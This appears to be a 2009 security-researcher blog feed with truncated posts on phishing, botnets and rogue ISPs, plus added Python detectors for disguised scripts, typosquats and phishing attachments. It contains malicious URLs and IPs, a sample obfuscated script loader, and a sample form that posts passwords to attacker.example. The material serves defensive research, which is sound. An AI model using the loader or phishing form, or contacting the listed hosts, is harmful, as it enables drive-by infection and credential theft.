Friday, 27 November 2009

The 31st issue of everybody's favorite Ubuntu magazine is out! With 9.10 Karmic Koala just about a month old and the next release, Lucid Lynx, already on the horizon and in the news, take a look at what else is going on. This month, we've got:
- Command and Conquer.
- How-To: Program in Python – Part 5, The Perfect Server – Part 1, and Universe of Sound.
- My Story – The Conversion.
- My Opinion –
There is a lot of buzz surrounding the "New Moon" movie. In fact, there are thousands of websites trying to lure people into watching the movie for free, from the comfort of your home. Let's mention that the movie is still in theatres. Among those sites, there are those almost too good to be true portals, where the movie is only a click away:
Read more: http://blogs.paretologic.com/malwarediaries/

Thursday, 26 November 2009

I wrote a while back (July, August and then again in September) about the Alliance and Leicester botnet that served to scam the unwitting out of their banking information. Then of course, there was the MSN phishing from the Sun Network range, which later spilled onto a botnet when Jonathan and I kept getting them shut down. Now it seems both the Alliance and Leicester, and the MSN phishing
I've just received several more Facebook e-mails that point to URLs hosted on a botnet, and both steal your information, load an iFrame to an exploit, and finally offer you an "update tool" that is the well known Zbot infection. Sadly, Outlook 2007 isn't letting my Outlook Export application work properly, so I've had to grab the IPs and such manually (well, via hpObserver ;)).
hpObserver

Sunday, 22 November 2009

Jonathan sent me an e-mail earlier, referring to a domain involved in phishing. This particular one however, contains several interesting aspects. Most notably, it not only asks for your Facebook credentials, it also leads to what claims to be a legit software developer, and this "legit" developer is offering a Conduit toolbar, claiming it to be a "Facebook toolbar". msbitsoftware.com is an Israel

Wednesday, 18 November 2009

I've received two of these so far, both pointing to two different domains of course, and find them rather intriguing given it's the first time I've seen this method used. The e-mails start off pretty typical of the 419ers, but then proceed with a link to ask for a donation - and so far, there's no additional infection involved that I can see;
E-mail 1:
Hello,
My name is Marius and I am a student at
Okay, so I completely ruined what used to be a great Rod Stewart song - but it's been worth it. I was alerted by my friend Dee Hughes over at Freeware Home of a rogue domain one of her visitors came across during a Google search for Outlook Express, which led via the Sponsored results (surprise surprise) to expressdownloadz.com (see left). She asked if I could dig up anything on this domain as

Tuesday, 17 November 2009

Sorry folks, in fixing the last bug I introduced another.
* Fixed another bug in view_spammers.php and view_spammers_mail.php
Ref: http://temerc.com/forums/viewtopic.php?f=71&t=7606
Download: http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool
v0.40 of the SBST (Spambot Search Tool) has now been released.
* Fixed bug in view_spammers.php and view_spammers_mail.php
Ref: http://temerc.com/forums/viewtopic.php?f=71&t=7606
Download: http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

Sunday, 15 November 2009

Looking up records for AS46636, I noticed something interesting. The netblock WHOIS showed a reference to "uaonline", but the AS was saying it belonged to NatCoWeb; clearly something was amiss here, as I remember this as being Real International Business Corp just a few months ago. I decided to look further, and got clarification that Real International Business Corp are indeed NatCoWeb, thanks
Ecatel (AS29073) have been on the radar for quite some time now, and looking at the amount of malicious content on their network, I'm not expecting this to go away any time soon. What I do find interesting is that the newest domains I've come across on their network appear to be trying (and very badly, I might add) to confuse automated analysis by obfuscating the code of the site you're eventually

Friday, 13 November 2009

WordPress have released a new version folks. MAKE SURE YOU'RE KEEPING YOURS UP TO DATE!
2.8.6 fixes two security problems that can be exploited by registered, logged in users who have posting privileges. If you have untrusted authors on your blog, upgrading to 2.8.6 is recommended. The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem,
Seems Malwarebytes have gotten themselves a fan, alongside the fans already out for MalwareDomainList et al. Just as with malwaredomainlist2.com (which sporadically redirects via domains such as ask.com now, by the way), this one is currently parked.
Referred to: whois.above.com
By: whois.internic.net
Registration Service Provided By: ABOVE.COM, INC.
Contact: +613.95897946
Domain Name:
Just a warning folks. I've just received the following from PlusNet that indicates there's going to be an excessively high amount of traffic this coming weekend, which will see the potential for reduced performance for all of their customers, including those such as myself that have the business package.
Service: Network Capacity (ADSL/20CN)
Posted: Fri, Nov 13 2009 at 17:27:13
Subject: Broadband
As if BT ripping you off by charging a fortune for calling people isn't enough (over £2 for under 3 mins to a US number!), the phishers have come up with a little help for our dear BT management and shareholders, in the form of a phishing scam. I was advised about this a little earlier (sorry folks, was sleeping or would've posted this earlier). I don't have the original headers for the e-mail,

Thursday, 12 November 2009

If you've been anywhere online lately, especially Google or the likes, you'll no doubt have noticed or read about the blackhat SEO campaigns. One of the many ISPs involved, whether deliberately or otherwise, is EuroConnex. This ISP has an excessively large amount of malicious domains currently present within their network. One of the most recent I came across was actually whilst writing this,

Wednesday, 11 November 2009

Personally, I don't believe the fine is large enough. Nor do I believe the Tagged CEO's response. Tagged knew exactly what they were doing, and were playing on their "users" (read: victims) not understanding that the company was stealing their contacts list in order to spam them - exactly what some other "social networking" sites do (i.e. Meet Your Messenger, WAYN et al). Tagged.com has paid

Tuesday, 10 November 2009

I am happy to announce there is a new hpHosts mirror available at:
hphosts.gt500.org
I've also updated and cleaned up the mirror list:
http://forum.hosts-file.net/viewtopic.php?f=23&t=6
Special thanks to GT500!
Just a note folks, I've been advised that malwaredomainlist2.com has now also been registered, and not by any of us that run the real malwaredomainlist.com website. There's currently no website actually there, it's parked with sedoparking.com, but we're expecting abuse, and most likely the same form as we saw last time.
Referred to: whois.above.com
By: whois.internic.net
Registration Service
I am happy to announce there's now a new server for you to choose from when using the vURL Online service. The mirror for the proxying script used by the server comes courtesy of fellow researcher GT500 over at the Malwarebytes forums.
Just a note folks, the hpHosts network will be down for approx 15-20 mins (hopefully a lot less, depends on how the router behaves with the new firmware) to allow for the upgrading of the router's firmware. This update will start as soon as I've posted this.
/update 18:02
Upgrade complete, and went a lot smoother than the last one :o)
From the desk of "here Piradius goes again" comes news of their yet again providing housing to Zbot infrastructure... sorry Piradius, what was that, you're a legit ISP? Well, the evidence we've seen over the months says otherwise, I'm afraid. Piradius.net appears to be up to its dark grey hat antics again with a server at 124.217.251.179 which is providing services to the current run of Zbot
Hosting Panama have several ranges that are, or have been, involved in malicious activity. The latest of these being 200.106.145.0/24, which is responsible for this little baggage of fun:
http://proanalytics.cn/stats.txt
This text file of course isn't a text file at all; it's a JavaScript file that leads to a whole heap of malicious exploit goodness:
http://proanalytics.cn/tds/go.php?sid=1
http://
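The "text file that isn't a text file" trick above is easy to catch mechanically: a response whose extension or Content-Type claims to be inert (plain text, an image, a stylesheet) but whose body contains script constructs. The following is an added example written for this page, not code from the post's author or the hpHosts project. The URL it checks is the one the post names; the body it scans is a constructed sample in the same document.write/unescape style, not the real content of that file. It %-decodes the body once before matching so that tags hidden as %3Cscript%3E are still found, and it pulls out the URLs the script would load, which is what you want to feed into a blocklist next.

```python
import re
from urllib.parse import unquote

# Constructs that have no business in a file served as plain text or an image.
SCRIPT_MARKERS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "iframe_tag": re.compile(r"<iframe\b", re.I),
    "document_write": re.compile(r"\bdocument\.write\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"\bString\.fromCharCode\s*\("),
}
INERT_TYPES = ("text/plain", "text/css", "image/")
INERT_EXTS = {"txt", "css", "jpg", "jpeg", "gif", "png", "ico"}
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")


def script_markers(body):
    """Names of the script markers found in body. The body is %-decoded one
    round first, because unescape()-style obfuscation hides the tags as
    %3Cscript%3E and would otherwise slip past a plain regex."""
    decoded = unquote(body)
    return [name for name, pat in SCRIPT_MARKERS.items() if pat.search(decoded)]


def referenced_urls(body):
    """URLs the script would load, including ones hidden behind %-encoding."""
    return sorted(set(URL_RE.findall(unquote(body))))


def classify(url, content_type, body):
    """Flag a response that claims to be inert (by extension or Content-Type)
    but carries script. Returns a dict suitable for logging or blocklisting."""
    path = url.split("?", 1)[0]
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    claims_inert = ext in INERT_EXTS or content_type.lower().startswith(INERT_TYPES)
    markers = script_markers(body)
    return {
        "url": url,
        "claims_inert": claims_inert,
        "markers": markers,
        "loads": referenced_urls(body),
        "suspicious": claims_inert and bool(markers),
    }


# Constructed sample body in the style the post describes; NOT the real
# content of stats.txt.
SAMPLE_BODY = (
    "document.write(unescape('%3Cscript src=%22http://proanalytics.cn/tds/go.php"
    "?sid=1%22%3E%3C/script%3E'));"
)

if __name__ == "__main__":
    print(classify("http://proanalytics.cn/stats.txt", "text/plain", SAMPLE_BODY))
    print(classify("http://example.net/stats.txt", "text/plain", "hits=1234\nvisitors=56"))
```

A genuine script served as application/javascript from a .js path is not flagged: the heuristic fires only on the mismatch between what the file claims to be and what it contains. Raise the bar (two markers instead of one) if you run it against a large crawl and the single-marker rule is too noisy.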
I know I shouldn't be laughing, but after all the fanboys going wild with digs at IE etc. users about how "oh so more secure" Firefox is, I just can't help myself. I said this would happen, as did many others, and the fanboys were unable, and are still unable, to provide a reasonable defense as to why we were wrong, instead preferring to go into childish playground arguments (ever found a fanboy

Monday, 9 November 2009

Next on the list of cybercrime-friendly ISPs is root eSolutions, who, amongst many others, are providing a home for a range known as "Financial company "Titan" LTD" (193.169.12.0/23, AS49353 (TITAN)). This range has been the home of many a fake AV, exploits and various other things for longer than I'd like, and seemingly, root eSolutions don't give a hoot. Something we need to change. Just some of
Jonathan has been firing off e-mails to abuse depts for the various ISPs involved in providing hosting to one of the domains, and has sent me an update that includes those that have both responded and taken action, and those that have not.
ISPs who have taken action already:
24.117.242.185 -> CableOne = DOWN, or just timing out.
77.127.51.53 -> Zahav.net.il = DOWN, or just timing

Sunday, 8 November 2009

If you remember, I wrote a couple of days ago about China-based ISP Sun Network. Jonathan has been e-mailing them since, and they've now gone back to claiming they can't do anything as it doesn't lie within their authority (funny, given they'd already sent their customer an e-mail saying they had 72 hours to remove the malicious content). What is worse however, is that their customer has not only

Saturday, 7 November 2009

99% of you will already be aware of the likes of typo squatters, so I'll refrain from blabbering on about those, and instead use one I came across today, which isn't actually a typo squatter, is "parked", but still contains a nasty surprise. The domain is hostsfile.net; look familiar? Yep, hpHosts is hosts-file.net (notice the difference?). If you made a typo whilst looking for the hpHosts
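Whether or not hostsfile.net was registered with hpHosts in mind, the hyphen-dropped form of your own domain is exactly the kind of look-alike you should be watching for yourself rather than waiting to stumble over. The following is an added example, not code from the post's author or the hpHosts project: it generates the common look-alike variants of a domain (hyphens dropped, a character dropped, doubled or transposed, fat-finger substitutions) and intersects them with a list of domains you have observed. The observed list here is constructed for the example; in practice you would feed it zone data, passive DNS or your own hosts-file entries.

```python
# Keyboard neighbours used for fat-finger substitutions (assumption: a small
# QWERTY subset is enough for a demonstration; extend as needed).
KEYBOARD_NEIGHBOURS = {
    "a": "qs", "e": "wr", "i": "uo", "o": "ip", "u": "yi",
    "s": "ad", "t": "ry", "h": "gj", "l": "k", "f": "dg", "n": "bm",
}


def typo_variants(domain):
    """Return look-alike domains for `domain`: hyphens dropped
    (hosts-file.net -> hostsfile.net), one character dropped, doubled or
    transposed with its neighbour, and keyboard-neighbour substitutions.
    Only the registrable label is mutated; the TLD is kept as-is."""
    label, _, tld = domain.lower().rpartition(".")
    cands = {label.replace("-", "")}
    for i, ch in enumerate(label):
        cands.add(label[:i] + label[i + 1:])                # dropped character
        cands.add(label[:i] + ch + label[i:])               # doubled character
        if i + 1 < len(label):                              # adjacent transposition
            cands.add(label[:i] + label[i + 1] + ch + label[i + 2:])
        for n in KEYBOARD_NEIGHBOURS.get(ch, ""):           # fat-finger substitution
            cands.add(label[:i] + n + label[i + 1:])
    cands.discard(label)                                    # the real domain is not a squat
    return {f"{c}.{tld}" for c in cands
            if c and not c.startswith("-") and not c.endswith("-") and "--" not in c}


def squatters(domain, observed):
    """Observed domains that are look-alikes of `domain`, sorted."""
    return sorted(typo_variants(domain) & set(observed))


# Constructed list of "seen" domains for the example; not real data.
OBSERVED = {"hostsfile.net", "hosts-file.net", "example.net"}

if __name__ == "__main__":
    print(len(typo_variants("hosts-file.net")), "variants generated")
    print("look-alikes seen:", squatters("hosts-file.net", OBSERVED))
```

The candidate set is small enough (a few hundred names for a ten-character label) to resolve or WHOIS in a scheduled job; anything that resolves and is not yours goes on your watch list before a visitor finds it for you.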

Friday, 6 November 2009

What do you get if you cross MSN + scammers + a rogue Chinese ISP? That's right folks, a whole lot of phishing phun!
http://hosts-file.net/?s=121.54.17.&view=matches
NB: Those previously at 121.54.174.* moved to .171 after their 174.* IPs were shut off; these will be reflected in the main hpHosts database when someone queries the respective domains' report pages.
My friend Jonathan has been tracking
In my previous article, I talked about the Ozdok command and control architecture and its fallback mechanisms in great detail. That article was an attempt to highlight different approaches to take down this botnet theoretically. But when it comes to the actual shutdown, it's far more complex than just finding out the command and control server coordinates and fallback mechanisms. An actual shut

Thursday, 5 November 2009

Killing the beast... Part 4 (Ozdok)
Ozdok a.k.a. Mega-D is one of those botnets that has been very successful flying under the radar over the past few years. Recent stats by Marshal TRACE show Ozdok is currently responsible for about 4.2% of the world's overall spam. The question that arises again is who are the guys controlling this botnet, and more importantly, from where? I recently conducted a

Tuesday, 3 November 2009

We've had various phishing botnets over the years, and this one is no different, well, almost. I received several e-mails claiming to be from Facebook, with the following content:
facebook
Dear Facebook user,
In an effort to make your online experience safer and more enjoyable, Facebook will be implementing a new login system that will affect all Facebook users. These changes will offer new features

Monday, 2 November 2009

"Serious" over at the Malwarebytes forums alerted me to a site that was suspected of ripping off the VirScan.org site (which provides a service along the lines of VirusTotal), www.hrppw.com.cn. I fired off an e-mail to the virscan.org guys to see if they knew anything about it, and it appears they weren't aware of it. I thought I'd upload a file to see how exactly they were doing this, whether they were
Malwarebytes Corporation have recently published information on their blog concerning the stealing of the Malwarebytes Anti-Malware database by China-based IObit.
Malwarebytes has recently uncovered evidence that a company called IOBit based in China is stealing and incorporating our proprietary database and intellectual property into their software. We know this will sound hard to believe,

Sunday, 1 November 2009

A next-generation Web server honeypot project is under way that poses as Web servers with thousands of vulnerabilities in order to gather firsthand data from real attacks targeting Websites. Unlike other Web honeypots, the new open-source Glastopf tool dynamically emulates vulnerabilities attackers are looking for, so it's more realistic and can gather more detailed attack information, according
There seems to be a trend over the past 6 months of switching from links directly in the phishing e-mails to having the entire phishing page in the e-mail itself (as an attachment). Others in the security arena have already publicised this for the most part, so I'll skip over the details. I wonder however, why our dear scammer has done this. I know it's to try and bypass phishing and junk
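Shipping the page as an attachment means URL-based filters see no link to check, so the check has to move to the attachment itself: an attached HTML document containing a form with a password field that posts anywhere other than your own hosts is about as clear a signal as phishing gives. The following is an added example, not code from the post's author or any filtering product: it walks a message with the standard library, parses every attached HTML part, and reports forms that collect a password and submit it to an untrusted host. The message it scans is constructed inside the block (the sender, recipient and attacker.example host are all made up for the example).

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormScanner(HTMLParser):
    """Collect every <form> in an HTML document with its action and inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["inputs"].append((a.get("type", "text").lower(), a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def scan_message(raw, trusted_hosts):
    """Return one finding per attached HTML form that collects a password and
    posts it to a host outside trusted_hosts. A form with no host at all (a
    relative action) is also reported: inside an attachment it can only be
    handing the data to the attacker's own script."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get_content_disposition() != "attachment":
            continue  # an inline HTML body is a different problem
        scanner = FormScanner()
        scanner.feed(part.get_content())
        for form in scanner.forms:
            has_password = any(t == "password" for t, _ in form["inputs"])
            host = urlparse(form["action"]).hostname or ""
            if has_password and host not in trusted_hosts:
                findings.append({
                    "filename": part.get_filename(),
                    "action_host": host,
                    "fields": [n for _, n in form["inputs"] if n],
                })
    return findings


# Constructed sample attachment; not a real phishing page.
SAMPLE_HTML = """<html><body>
<form method="post" action="http://attacker.example/collect.php">
  <input type="text" name="email"><input type="password" name="pass">
  <input type="submit" value="Login">
</form></body></html>"""


def build_sample():
    """Assemble a constructed message with the phishing page attached."""
    msg = EmailMessage()
    msg["From"] = "security@bank.example"
    msg["To"] = "victim@example.net"
    msg["Subject"] = "Please confirm your account"
    msg.set_content("Open the attached form to confirm your details.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="confirm.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample(), trusted_hosts={"www.bank.example"}):
        print(finding)
```

Note what this does not catch: a page whose form is built by script at load time, or one that hides the action behind JavaScript. For those the attachment needs rendering in a sandbox; the static check above is the cheap first pass that removes the bulk of what the post describes.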